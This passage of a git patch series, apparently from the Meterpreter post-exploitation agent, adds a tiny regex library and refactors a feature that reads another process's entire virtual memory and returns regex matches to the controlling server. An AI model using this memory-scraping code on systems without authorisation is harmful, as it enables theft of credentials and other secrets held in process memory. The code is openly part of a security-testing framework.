+static int matchrange(char c, const char* str) +{ + return ( (c != '-') + && (str[0] != '\0') + && (str[0] != '-') + && (str[1] == '-') + && (str[2] != '\0') + && ( (c >= str[0]) + && (c <= str[2]))); +} +static int matchdot(char c) +{ +#if defined(RE_DOT_MATCHES_NEWLINE) && (RE_DOT_MATCHES_NEWLINE == 1) + (void)c; + return 1; +#else + return c != '\n' && c != '\r'; +#endif +} +static int ismetachar(char c) +{ + return ((c == 's') || (c == 'S') || (c == 'w') || (c == 'W') || (c == 'd') || (c == 'D')); +} + +static int matchmetachar(char c, const char* str) +{ + switch (str[0]) + { + case 'd': return matchdigit(c); + case 'D': return !matchdigit(c); + case 'w': return matchalphanum(c); + case 'W': return !matchalphanum(c); + case 's': return matchwhitespace(c); + case 'S': return !matchwhitespace(c); + default: return (c == str[0]); + } +} + +static int matchcharclass(char c, const char* str) +{ + do + { + if (matchrange(c, str)) + { + return 1; + } + else if (str[0] == '\\') + { + /* Escape-char: increment str-ptr and match on next char */ + str += 1; + if (matchmetachar(c, str)) + { + return 1; + } + else if ((c == str[0]) && !ismetachar(c)) + { + return 1; + } + } + else if (c == str[0]) + { + if (c == '-') + { + return ((str[-1] == '\0') || (str[1] == '\0')); + } + else + { + return 1; + } + } + } + while (*str++ != '\0'); + + return 0; +} + +static int matchone(regex_t p, char c) +{ + switch (p.type) + { + case DOT: return matchdot(c); + case CHAR_CLASS: return matchcharclass(c, (const char*)p.u.ccl); + case INV_CHAR_CLASS: return !matchcharclass(c, (const char*)p.u.ccl); + case DIGIT: return matchdigit(c); + case NOT_DIGIT: return !matchdigit(c); + case ALPHA: return matchalphanum(c); + case NOT_ALPHA: return !matchalphanum(c); + case WHITESPACE: return matchwhitespace(c); + case NOT_WHITESPACE: return !matchwhitespace(c); + default: return (p.u.ch == c); + } +} + +static int matchstar(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + size_t prelen = *matchlength; + const char* prepoint = text; + while ((text_offset < text_length) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (&text[text_offset] >= prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, matchlength)) + return 1; + (*matchlength)--; + } + + *matchlength = prelen; + return 0; +} + +static int matchplus(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + const char* prepoint = text; + while ((text_offset < text_length) && matchone(p, text[text_offset])) + { + text_offset++; + (*matchlength)++; + } + while (text > prepoint) + { + if (matchpattern(pattern, text, text_length, text_offset--, matchlength)) + return 1; + (*matchlength)--; + } + + return 0; +} + +static int matchquestion(regex_t p, regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + if (p.type == UNUSED) + return 1; + if (matchpattern(pattern, text, text_length, text_offset, matchlength)) + return 1; + if ((text_offset < text_length) && matchone(p, text[text_offset++])) + { + if (matchpattern(pattern, text, text_length, text_offset, matchlength)) + { + (*matchlength)++; + return 1; + } + } + return 0; +} + + +#if 0 + +/* Recursive matching */ +static int matchpattern(regex_t* pattern, const char* text, int *matchlength) +{ + int pre = *matchlength; + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[1], &pattern[2], text, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return text[0] == '\0'; + } + else if ((text[0] != '\0') && matchone(pattern[0], text[0])) + { + (*matchlength)++; + return matchpattern(&pattern[1], text+1); + } + else + { + *matchlength = pre; + return 0; + } +} + +#else + +/* Iterative matching */ +static int matchpattern(regex_t* pattern, const char* text, size_t text_length, size_t text_offset, size_t* matchlength) +{ + size_t pre = *matchlength; + do + { + if ((pattern[0].type == UNUSED) || (pattern[1].type == QUESTIONMARK)) + { + return matchquestion(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + } + else if (pattern[1].type == STAR) + { + return matchstar(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + } + else if (pattern[1].type == PLUS) + { + return matchplus(pattern[0], &pattern[2], text, text_length, text_offset, matchlength); + } + else if ((pattern[0].type == END) && pattern[1].type == UNUSED) + { + return (text_offset == text_length - 1); + } +/* Branching is not working properly + else if (pattern[1].type == BRANCH) + { + return (matchpattern(pattern, text) || matchpattern(&pattern[2], text)); + } +*/ + (*matchlength)++; + } + while ((text_offset < text_length) && matchone(*pattern++, text[text_offset++])); + + *matchlength = pre; + return 0; +} + +#endif diff --git a/c/meterpreter/source/tiny-regex-c/re.h b/c/meterpreter/source/tiny-regex-c/re.h new file mode 100644 index 000000000..bd084cccb --- /dev/null +++ b/c/meterpreter/source/tiny-regex-c/re.h @@ -0,0 +1,75 @@ +/* + * + * Mini regex-module inspired by Rob Pike's regex code described in: + * + * http://www.cs.princeton.edu/courses/archive/spr09/cos333/beautiful.html + * + * + * + * Supports: + * --------- + * '.' Dot, matches any character + * '^' Start anchor, matches beginning of string + * '$' End anchor, matches end of string + * '*' Asterisk, match zero or more (greedy) + * '+' Plus, match one or more (greedy) + * '?' Question, match zero or one (non-greedy) + * '[abc]' Character class, match if one of {'a', 'b', 'c'} + * '[^abc]' Inverted class, match if NOT one of {'a', 'b', 'c'} -- NOTE: feature is currently broken! + * '[a-zA-Z]' Character ranges, the character set of the ranges { a-z | A-Z } + * '\s' Whitespace, \t \f \r \n \v and spaces + * '\S' Non-whitespace + * '\w' Alphanumeric, [a-zA-Z0-9_] + * '\W' Non-alphanumeric + * '\d' Digits, [0-9] + * '\D' Non-digits + * + * + */ + +#ifndef _TINY_REGEX_C +#define _TINY_REGEX_C + +#ifndef RE_DOT_MATCHES_NEWLINE +/* Define to 0 if you DON'T want '.' to match '\r' + '\n' */ +#define RE_DOT_MATCHES_NEWLINE 1 +#endif + +#ifdef __cplusplus +extern "C"{ +#endif + +// size_t for 32-bit compilation. +#include + +typedef struct regex_t +{ + unsigned char type; /* CHAR, STAR, etc. */ + union + { + unsigned char ch; /* the character itself */ + unsigned char* ccl; /* OR a pointer to characters in class */ + } u; +} regex_t; + +/* Typedef'd pointer to get abstract datatype. */ +typedef struct regex_t* re_t; + + +/* Compile regex string pattern to a regex_t-array. */ +re_t re_compile(const char* pattern, size_t pattern_length); + + +/* Find matches of the compiled pattern inside text. */ +int re_matchp(re_t pattern, const char* text, size_t text_length, size_t* matchlength); + + +/* Find matches of the txt pattern inside text (will compile automatically first). */ +int re_match(const char* pattern, size_t pattern_length, const char* text, size_t text_length, size_t* matchlength); + + +#ifdef __cplusplus +} +#endif + +#endif /* ifndef _TINY_REGEX_C */ diff --git a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt index f783b441a..813117b2d 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt +++ b/c/meterpreter/workspace/ext_server_stdapi/CMakeLists.txt @@ -22,6 +22,7 @@ include_directories(../../source/common) include_directories(../../source/jpeg-8) include_directories(../../source/ReflectiveDLLInjection/common) include_directories(../../source/extensions/stdapi/server) +include_directories(../../source/tiny-regex-c) set(SRC_DIR ../../source/extensions/stdapi) file(GLOB_RECURSE SRC_FILES @@ -29,6 +30,7 @@ file(GLOB_RECURSE SRC_FILES ${SRC_DIR}/*.cpp ${SRC_DIR}/*.rc ${MOD_DEF_DIR}/extension.def + ../../source/tiny-regex-c/*.c ) list(REMOVE_ITEM SRC_FILES ${CMAKE_CURRENT_SOURCE_DIR}/${SRC_DIR}/server/resource/hook.c) diff --git a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj index 238aa06ee..8256f7229 100644 --- a/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj +++ b/c/meterpreter/workspace/ext_server_stdapi/ext_server_stdapi.vcxproj @@ -559,6 +559,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + @@ -587,6 +588,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\" + From 72b39289d0878181a096019a1dc799ce1bde0d18 Mon Sep 17 00:00:00 2001 From: sjanusz-r7 Date: Fri, 1 Dec 2023 17:32:06 +0000 Subject: [PATCH 02/14] Compile regex in-place, rename CHAR to CHAR_RE due to Windows typedef'ing CHAR, correctly free compiled needle and associated buffer --- .../stdapi/server/sys/process/memory.c | 309 +++++++++++------- c/meterpreter/source/tiny-regex-c/re.c | 250 +++++++------- c/meterpreter/source/tiny-regex-c/re.h | 12 +- 3 files changed, 305 insertions(+), 266 deletions(-) diff --git a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c index ea8ae32be..4d2eef43a 100644 --- a/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c +++ b/c/meterpreter/source/extensions/stdapi/server/sys/process/memory.c @@ -341,10 +341,6 @@ DWORD request_sys_process_memory_unlock(Remote *remote, Packet *packet) return ERROR_SUCCESS; } -typedef NTSTATUS* PNTSTATUS; - -#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) - #ifndef __kernel_entry #define __kernel_entry #endif @@ -353,8 +349,6 @@ typedef __kernel_entry NTSTATUS(WINAPI* NTQUERYINFORMATIONPROCESS) (HANDLE Proce typedef SIZE_T(WINAPI* VIRTUALQUERYEX) (HANDLE hProcess, LPCVOID lpAddress, PMEMORY_BASIC_INFORMATION lpBuffer, SIZE_T dwLength); -typedef BOOL(WINAPI* READPROCESSMEMORY) (HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T mSize, SIZE_T* lpNumberOfBytesRead); - typedef BOOL(WINAPI* CLOSEHANDLE) (HANDLE hObject); typedef HANDLE(WINAPI* OPENPROCESS) (DWORD dwDesiredAccess, BOOL bInheritHandle, DWORD dwProcessId); @@ -370,9 +364,6 @@ typedef enum _MEMORY_INFORMATION_CLASS { MemoryBasicInformation } MEMORY_INFORMATION_CLASS, * PMEMORY_INFORMATION_CLASS; -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtQueryVirtualMemory.html -typedef __kernel_entry NTSTATUS(NTAPI* NTQUERYVIRTUALMEMORY) (HANDLE ProcessHandle, LPCVOID BaseAddress, MEMORY_INFORMATION_CLASS MemoryInformationClass, LPVOID Buffer, SIZE_T Length, PSIZE_T ResultLength); - typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; @@ -391,27 +382,6 @@ typedef struct _OBJECT_ATTRIBUTES { PVOID SecurityQualityOfService; } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; -// https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsts/a11e7129-685b-4535-8d37-21d4596ac057 -typedef struct _CLIENT_ID { - HANDLE UniqueProcess; - HANDLE UniqueThread; -} CLIENT_ID, * PCLIENT_ID; - -// http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FNT%20Objects%2FProcess%2FNtOpenProcess.html -// https://ntdoc.m417z.com/ntopenprocess -typedef NTSTATUS(NTAPI* NTOPENPROCESS) (PHANDLE ProcessHandle, ACCESS_MASK AccessMask, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); - -//typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -//{ -// DWORD dwLength; -// DWORD dwInitialized; -// LPVOID lpSsHandle; -// LIST_ENTRY InLoadOrderModuleList; -// LIST_ENTRY InMemoryOrderModuleList; -// LIST_ENTRY InInitializationOrderModuleList; -// LPVOID lpEntryInProgress; -//} PEB_LDR_DATA, * PPEB_LDR_DATA; - typedef struct _RTL_USER_PROCESS_PARAMETERS { BYTE Reserved1[16]; PVOID Reserved2[10]; @@ -473,10 +443,165 @@ struct regex_needle char* raw_needle_buffer; size_t length; regex_t* compiled_needle; + unsigned char* char_buf; }; #define NEEDLES_MAX (size_t)5 +#define MEMORY_BUFFER_SIZE (size_t)(64 * 1024 * 1024) + +/// +/// Add the needle results to a packet. This automatically inserts each result into a new group. Returns ERROR_SUCCESS on success, or 1 on failure. +/// +/// The packet to insert the needle goup into +/// ERROR_SUCCESS on success, else non-zero +NTSTATUS add_needle_results_to_packet(Packet** out, const char* memory_buffer_ptr, size_t match_length, size_t match_address, size_t memory_base_address, size_t memory_region_size) +{ + if (out == NULL || memory_buffer_ptr == NULL) { return ERROR_INVALID_PARAMETER; } + + dprintf("[MEM SEARCH] Creating results group"); + + Packet* search_results = met_api->packet.create_group(); + if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Adding results to packet group"); + + dprintf("[MEM SEARCH] Adding Match bytes"); + // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. + met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, (LPVOID)memory_buffer_ptr, (DWORD)match_length + 1); + + dprintf("[MEM SEARCH] Adding Match address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); + + dprintf("[MEM SEARCH] Adding Region base address"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, memory_base_address); + + dprintf("[MEM SEARCH] Adding Region size"); + met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, memory_region_size); + + dprintf("[MEM SEARCH] Adding Match Length"); + met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)match_length); + + dprintf("[MEM SEARCH] Adding Group"); + met_api->packet.add_group(*out, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + + return ERROR_SUCCESS; +} + +/// +/// Compile a regular expression in-place. +/// +/// A pointer to a regular expression needle struct. +/// ERROR_SUCCESS on success, ERROR_INVALID_PARAMETER when provided with a null pointer or the regular expression failed to compile +NTSTATUS re_compile_inplace(struct regex_needle** in_out) +{ + if (in_out == NULL) { return ERROR_INVALID_PARAMETER; } + const int compile_result = re_compile((*in_out)->raw_needle_buffer, (*in_out)->length, MAX_REGEXP_OBJECTS, MAX_CHAR_CLASS_LEN, &(*in_out)->compiled_needle, &(*in_out)->char_buf); + if (compile_result != ERROR_SUCCESS) { return ERROR_INVALID_PARAMETER; } + + return ERROR_SUCCESS; +} + +/// +/// Sets up a regular expression needle from a TLV. +/// +/// - Pointer to the needle TLV received from the server containing the needle buffer +/// - The compiled needle +/// ERROR_SUCCESS on success, non-zero on failure +NTSTATUS setup_needle_from_tlv(const Tlv* needle_buffer_tlv, struct regex_needle** out) +{ + // The header contains a null-terminator which we do not need. + dprintf("[MEM SEARCH] Getting needle length"); + const size_t needle_length = needle_buffer_tlv->header.length - 1; + if (needle_length == 0) { dprintf("[MEM SEARCH] Got a needle length of 0"); return ERROR_INVALID_PARAMETER; } + + (*out)->length = needle_length; + dprintf("[MEM SEARCH] Allocating memory for needle buffer"); + (*out)->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); + if ((*out)->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Copying TLV buffer to needle"); + memcpy((*out)->raw_needle_buffer, (char*)needle_buffer_tlv->buffer, needle_length); + + dprintf("[MEM SEARCH] Allocating memory for a compiled needle"); + (*out)->compiled_needle = (regex_t*)malloc(MAX_REGEXP_OBJECTS * sizeof(struct regex_t)); + if ((*out)->compiled_needle == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a compiled needle"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Allocating memory for a char buffer"); + (*out)->char_buf = (unsigned char*)malloc(MAX_CHAR_CLASS_LEN * sizeof(unsigned char)); + if ((*out)->char_buf == NULL) { dprintf("[MEM SEARCH] Unable to malloc memory for a char buffer"); return ERROR_OUTOFMEMORY; } + + dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv->buffer); + const NTSTATUS compile_result = re_compile_inplace(&(*out)); + if (compile_result != ERROR_SUCCESS) + { dprintf("[MEM SEARCH] Failed to compile needle"); return ERROR_INVALID_PARAMETER; } + + return ERROR_SUCCESS; +} + +NTSTATUS cleanup_needle(struct regex_needle** in) +{ + if (in == NULL || *in == NULL) { return ERROR_INVALID_PARAMETER; } + + if ((*in)->raw_needle_buffer != NULL) + { + dprintf("[MEM SEARCH] Freeing needle buffer"); + free((*in)->raw_needle_buffer); + } + + if ((*in)->char_buf != NULL) + { + dprintf("[MEM SEARCH] Freeing char buf"); + free((*in)->char_buf); + } + + if ((*in)->compiled_needle != NULL) + { + dprintf("[MEM SEARCH] Freeing compiled needle"); + free((*in)->compiled_needle); + } + + dprintf("[MEM SEARCH] Freeing regex needle."); + free((*in)); + return ERROR_SUCCESS; +} + +static HMODULE hKernel32 = NULL; +static HMODULE hNTDLL = NULL; + +static GETPROCADDRESS fGetProcAddress = NULL; +static OPENPROCESS fOpenProcess = NULL; +static CLOSEHANDLE fCloseHandle = NULL; +static VIRTUALQUERYEX fVirtualQueryEx = NULL; +static NTREADVIRTUALMEMORY fNtReadVirtualMemory = NULL; + +BOOL setup_handles() +{ + if ((hKernel32 = GetModuleHandleA("kernel32.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((hNTDLL = GetModuleHandleA("ntdll.dll")) == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); return ERROR_INVALID_HANDLE; } + + if ((fGetProcAddress = (GETPROCADDRESS)GetProcAddress(hKernel32, "GetProcAddress")) == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); return ERROR_INVALID_ADDRESS; } + + if ((fVirtualQueryEx = (VIRTUALQUERYEX)fGetProcAddress(hKernel32, "VirtualQueryEx")) == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); return ERROR_INVALID_ADDRESS; } + + if ((fOpenProcess = (OPENPROCESS)fGetProcAddress(hKernel32, "OpenProcess")) == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); return ERROR_INVALID_ADDRESS; } + + if ((fCloseHandle = (CLOSEHANDLE)fGetProcAddress(hKernel32, "CloseHandle")) == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); return ERROR_INVALID_ADDRESS; } + + if ((fNtReadVirtualMemory = (NTREADVIRTUALMEMORY)fGetProcAddress(hNTDLL, "NtReadVirtualMemory")) == NULL ) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); return ERROR_INVALID_ADDRESS; } + + return ERROR_SUCCESS; +} + +/* + * Read through all of a process's virtual memory in the search for regular expression needles. + * + * req: TLV_TYPE_PID - The target process ID. + * req: TLV_TYPE_MEMORY_SEARCH_NEEDLE - The regular expression needle to search for. + * req: TLV_TYPE_UINT - The minimum length of a match. + * req: TLV_TYPE_MEMORY_SEARCH_MATCH_LEN - The maximum length of a match. + */ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) { Packet* response = met_api->packet.create_response(packet); @@ -484,33 +609,28 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) char* buffer = NULL; size_t needle_enum_index = 0; HANDLE process_handle = NULL; + struct regex_needle* regex_needles[NEEDLES_MAX]; - dprintf("[MEM SEARCH] Getting PID..."); + dprintf("[MEM SEARCH] Getting PID"); const DWORD pid = met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_PID); if (pid == 0) { result = ERROR_INVALID_PARAMETER; goto done; } dprintf("[MEM SEARCH] Searching PID: %lu", pid); - // Iterate over all the needles in the packet. Tlv needle_buffer_tlv = { 0 }; - struct regex_needle* regex_needles[NEEDLES_MAX]; - while (needle_enum_index < (size_t)NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) + while (needle_enum_index < NEEDLES_MAX && met_api->packet.enum_tlv(packet, (DWORD)needle_enum_index, TLV_TYPE_MEMORY_SEARCH_NEEDLE, &needle_buffer_tlv) == ERROR_SUCCESS) { - // The header contains a null-terminator which we do not need. - const size_t needle_length = needle_buffer_tlv.header.length - 1; dprintf("[MEM SEARCH] Allocating %u bytes of memory for regex needle", sizeof(struct regex_needle)); regex_needles[needle_enum_index] = (struct regex_needle*)malloc(sizeof(struct regex_needle)); if (regex_needles[needle_enum_index] == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for regex needle"); result = ERROR_OUTOFMEMORY; goto done; } - - regex_needles[needle_enum_index]->length = needle_length; - regex_needles[needle_enum_index]->raw_needle_buffer = (char*)malloc(needle_length * sizeof(char)); - if (regex_needles[needle_enum_index]->raw_needle_buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory for raw needle buffer"); result = ERROR_OUTOFMEMORY; goto done; } - memcpy(regex_needles[needle_enum_index]->raw_needle_buffer, (char*)needle_buffer_tlv.buffer, needle_length); - - dprintf("[MEM SEARCH] Needle %u : %.*s with size (in bytes) %u", needle_enum_index, needle_length, regex_needles[needle_enum_index]->raw_needle_buffer, needle_length); - - dprintf("[MEM SEARCH] Compiling needle: %.*s", needle_length, (char*)needle_buffer_tlv.buffer); - regex_needles[needle_enum_index]->compiled_needle = re_compile(regex_needles[needle_enum_index]->raw_needle_buffer, regex_needles[needle_enum_index]->length); - if (regex_needles[needle_enum_index]->compiled_needle == NULL) { dprintf("[MEM SEARCH] Failed to compile needle"); result = ERROR_OUTOFMEMORY; goto done; } + + dprintf("[MEM SEARCH] Setting up needle from TLV"); + const NTSTATUS needle_setup_result = setup_needle_from_tlv(&needle_buffer_tlv, ®ex_needles[needle_enum_index]); + if (needle_setup_result != ERROR_SUCCESS) + { + dprintf("[MEM SEARCH] Failed to setup needle from TLV packet"); + result = needle_setup_result; + goto done; + } needle_enum_index++; } @@ -522,52 +642,23 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) const size_t current_max_match_length = max_match_length; dprintf("[MEM SEARCH] Getting handles & proc addresses"); - const HMODULE kernel32_dll = GetModuleHandleA("kernel32.dll"); - if (kernel32_dll == NULL) { dprintf("[MEM SEARCH] Could not get kernel32.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } - - const HMODULE ntdll_dll = GetModuleHandleA("ntdll.dll"); - if (ntdll_dll == NULL) { dprintf("[MEM SEARCH] Could not get ntdll.dll handle"); result = ERROR_INVALID_HANDLE; goto done; } - - const HANDLE get_proc_address = GetProcAddress(kernel32_dll, "GetProcAddress"); - if (get_proc_address == NULL) { dprintf("[MEM SEARCH] Could not get GetProcAddress handle"); result = ERROR_INVALID_ADDRESS; goto done; } - const GETPROCADDRESS GetProcAddress = (GETPROCADDRESS)get_proc_address; - - const HANDLE virtual_query_ex = GetProcAddress(kernel32_dll, "VirtualQueryEx"); - if (virtual_query_ex == NULL) { dprintf("[MEM SEARCH] Could not get VirtualQueryEx handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const HANDLE open_process = GetProcAddress(kernel32_dll, "OpenProcess"); - if (open_process == NULL) { dprintf("[MEM SEARCH] Could not get OpenProcess handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const HANDLE close_handle = GetProcAddress(kernel32_dll, "CloseHandle"); - if (close_handle == NULL) { dprintf("[MEM SEARCH] Could not get CloseHandle handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const HANDLE nt_read_virtual_memory = GetProcAddress(ntdll_dll, "NtReadVirtualMemory"); - if (nt_read_virtual_memory == NULL) { dprintf("[MEM SEARCH] Could not get NtReadVirtualMemory handle"); result = ERROR_INVALID_ADDRESS; goto done; } - - const OPENPROCESS OpenProcess = (OPENPROCESS)open_process; - const CLOSEHANDLE CloseHandle = (CLOSEHANDLE)close_handle; - const VIRTUALQUERYEX VirtualQueryEx = (VIRTUALQUERYEX)virtual_query_ex; - const NTREADVIRTUALMEMORY NtReadVirtualMemory = (NTREADVIRTUALMEMORY)nt_read_virtual_memory; + const NTSTATUS setup_handles_result = setup_handles(); + if (setup_handles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Could not set up all necessary handles & proc addresses"); result = setup_handles_result; goto done; } const DWORD process_vm_read = 0x0010; const DWORD process_query_information = 0x0400; const DWORD wanted_process_perms = process_vm_read | process_query_information; dprintf("[MEM SEARCH] Opening process"); - process_handle = OpenProcess(wanted_process_perms, FALSE, pid); + process_handle = fOpenProcess(wanted_process_perms, FALSE, pid); if (process_handle == NULL) { dprintf("[MEM SEARCH] Could not get process handle"); result = ERROR_INVALID_HANDLE; goto done; } MEMORY_BASIC_INFORMATION mem = { 0 }; - const size_t megabytes_64 = 64 * 1024 * 1024; - dprintf("[MEM SEARCH] Allocating buffer for storing process memory"); - buffer = (char*)malloc(megabytes_64); + buffer = (char*)malloc(MEMORY_BUFFER_SIZE); if (buffer == NULL) { dprintf("[MEM SEARCH] Could not allocate memory buffer"); result = ERROR_OUTOFMEMORY; goto done; } - // The maximum length of data that we can read into a buffer at a time from a memory region. - const size_t current_max_size = megabytes_64; - - for (size_t current_ptr = 0; VirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) + for (size_t current_ptr = 0; fVirtualQueryEx(process_handle, (LPCVOID)current_ptr, &mem, sizeof(mem)); current_ptr += mem.RegionSize) { if (!can_read_memory(mem.Protect)) { continue; } @@ -579,14 +670,14 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) while (mem.RegionSize > memory_region_offset) { const size_t leftover_bytes = mem.RegionSize - memory_region_offset; - const size_t bytes_to_read = min(leftover_bytes, current_max_size); + const size_t bytes_to_read = min(leftover_bytes, MEMORY_BUFFER_SIZE); dprintf("[MEM SEARCH] Leftover Bytes count: %llu", leftover_bytes); dprintf("[MEM SEARCH] Bytes to read: %llu", bytes_to_read); size_t bytes_read = 0; const size_t read_address = (size_t)mem.BaseAddress + memory_region_offset; // Note: This will read up to a maximum of bytes_to_read OR to the end of the memory region if the end of it has been reached. - const NTSTATUS read_virtual_memory_status = NtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); + const NTSTATUS read_virtual_memory_status = fNtReadVirtualMemory(process_handle, (LPCVOID)read_address, buffer, bytes_to_read, &bytes_read); if (read_virtual_memory_status != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Failed to read some virtual memory for process, skipping %u bytes", bytes_to_read); memory_region_offset += bytes_to_read; continue; } dprintf("[MEM SEARCH] Read %llu bytes", bytes_read); @@ -595,7 +686,6 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) for (size_t current_needle_index = 0; current_needle_index < needle_enum_index; current_needle_index++) { - // This is the buffer offset for this needle only. size_t current_buffer_offset = 0; size_t match_length = 0; int result = -1; @@ -609,38 +699,22 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) if (result != -1) { - const size_t match_address = read_address + result; + const size_t match_address = read_address + current_buffer_offset + result; dprintf("[MEM SEARCH] -- ! FOUND A REGEX MATCH ! --"); dprintf("[MEM SEARCH] Address: %p", match_address); - dprintf("[MEM SEARCH] Creating results group"); - - Packet* search_results = met_api->packet.create_group(); - if (search_results == NULL) { dprintf("[MEM SEARCH] Could not create search result group"); result = ERROR_OUTOFMEMORY; goto done; } - - dprintf("[MEM SEARCH] Adding results to packet group"); + if (match_length < min_match_length) + { + dprintf("[MEM SEARCH] Match length was too short, skipping."); + current_buffer_offset += (result + match_length); + continue; + } - dprintf("[MEM SEARCH] Adding Match bytes"); // TODO: Add a workaround for match length to the regex itself, allowing the regex engine to stop matching once an upper limit has been reached. const size_t current_match_length = min(max_match_length, match_length); - - // Note: This raw data needs to be read from the buffer we copied. Trying to read it from mem.BaseAddress directly will make us crash. - met_api->packet.add_tlv_raw(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_STR, buffer + current_buffer_offset + result, (DWORD)current_match_length); - - dprintf("[MEM SEARCH] Adding Match address"); - met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_ADDR, match_address); - - dprintf("[MEM SEARCH] Adding Region base address"); - met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_START_ADDR, (size_t)mem.BaseAddress); - - dprintf("[MEM SEARCH] Adding Region size"); - met_api->packet.add_tlv_qword(search_results, TLV_TYPE_MEMORY_SEARCH_SECT_LEN, mem.RegionSize); - - dprintf("[MEM SEARCH] Adding Match Length"); - met_api->packet.add_tlv_uint(search_results, TLV_TYPE_MEMORY_SEARCH_MATCH_LEN, (UINT)current_match_length); - - dprintf("[MEM SEARCH] Adding Group"); - met_api->packet.add_group(response, TLV_TYPE_MEMORY_SEARCH_RESULTS, search_results); + const char* memory_buffer_ptr = buffer + current_buffer_offset + result; + const NTSTATUS add_needles_result = add_needle_results_to_packet(&response, memory_buffer_ptr, current_match_length, match_address, (size_t)mem.BaseAddress, mem.RegionSize); + if (add_needles_result != ERROR_SUCCESS) { dprintf("[MEM SEARCH] Adding search results to packet was not successful"); } current_buffer_offset += (result + current_match_length); } @@ -658,22 +732,13 @@ DWORD request_sys_process_memory_search(Remote* remote, Packet* packet) done: dprintf("[MEM SEARCH] Memory 